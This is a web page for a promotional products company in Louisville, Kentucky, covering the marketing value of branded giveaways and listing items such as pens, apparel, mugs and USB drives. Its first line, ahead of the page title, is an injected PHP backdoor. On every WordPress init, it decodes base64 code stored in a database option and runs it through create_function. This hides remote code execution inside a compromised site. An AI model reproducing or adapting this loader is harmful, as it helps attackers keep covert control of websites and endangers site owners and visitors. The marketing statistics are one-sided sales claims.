add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); Louisville Promotional Products, KY, Custom Branded Items | Promotional Printing Services
Call: (502) 873-0333 | Email:

Louisville Promotional Products

The law of reciprocity states, “Give, and you shall receive.” Giving a promotional item, gift, or sample product to an individual is often the first step in creating a lifelong business relationship. In a recent study by L.J. Market Research, 52 percent of individuals given a promotional item ultimately did business with that company. The remaining 48% of participants said they would be more likely to do business with that company in the future because of their gesture.

Promotional products are one of the best ways to achieve several marketing goals with one simple product. A custom branded giveaway attracts new clients, increases brand awareness and ultimately grows your business.

Here are some of the ways custom promotional products can get your business off the ground.Custom Logo Pens


Need a conversation starter? Begin by offering your guests and potential clients a unique promotional item such as a custom water bottle, travel item, or brightly colored pen. Giving something to them is a great way to “break the ice” and engage that person in conversation. When people receive a gift, even a small one, they are more likely to be open, polite, and listen to what you have to say.


Everyone wants to sit at the table with the cool kids, and when you are competing in the world market, it is tough to maintain “cool kid” status. Stay at the top with promotional items that grab attention. When working a trade show, select swag that will be spotted across the floor and make people say, “Hey, where did you get that awesome duffle bag?” You will draw attention from all over the exhibit. According to Exhibit Surveys, Inc., there is a 176 percent increase in trade-show traffic to a booth that gave out promotional items.

Immortal Marketing

Typically, marketing has a short shelf life. TV ads run for a few weeks, billboards last a few months, radio ads come and go, but promotional items last forever. A mug you give away today may be used for years providing you with long-term exposure.

Positive Imaging

Looking for a way to tell everyone that you’re awesome? Promotional items are the easiest way to promote a positive image with a wide range of potential customers. While it may take a lifetime to develop brand recognition and positive brand reputation, promotional products cut this time down drastically. When companies give away a unique, useful, or custom promotional item, Louisiana State University found that 71 percent of individuals remembered the company’s name that gave it to them.

Don’t just limit the positive energy to marketing new customers; boost employee morale, while promoting your company with high quality milestone or achievement gifts. Jackets, backpacks, or blankets make great company gifts while motivating your team.

Expand Your Audience

You know your target audience, but what about everyone else? Promotional items reach people that you may not ordinarily target. The perfect customer may be the person walking by who happens to pick up a USB drive, or the individual who lost his pen and picks up yours. Because of their mobility, promotional items have no demographic or geographic limitations.

Promotional products are an effective, efficient, and easy. They are a single form of advertising that provides a multi-faceted approach to making your business successful. According to a study by Baylor University, companies who utilized promotional products did 22 percent more business than those who did not. You never know, when someone accidentally drops your pen at the airport, the one who picks it up may just close your next big deal.

Serving Louisville, Lexington, Elizabethtown, Frankfort, Shelbyville, Bardstown in Kentucky as well as Clarksville, Jeffersonville, New Albany in Southern Indiana

Additional services include – free samples, graphic design, embroidery, and storage for bulk orders.

Contact us today to see how we can help you promote and grow your business.

Click Here For Promotional Product Ideas

Just a few of the high quality printing products we offer include:

– Polo Shirts
– T-Shirts
– Jackets
Awards & Recognition
Name Badges, Lanyards, Name Tags
– Totes
– Duffel Bags
– Coolers
Executive Gifts

Caps & Hats
Computer Accessories
-USB (thumb drive / jump drive / flash drive)
Desk Items
– Notepads
– Sticky Notes
– Calculators
– Paper Weights
Golf Items
– Golf Balls
– Golf Tees
– Golf Apparel

Mugs & Drinkware
– Coffee Mugs
– Travel Mugs
– Cups
– Tumblers
– Golf Towels
Sport & Outdoor
– Umbrellas
– Chairs
Travel Items
– Luggage Tags
– Travel Bags
– Toiletries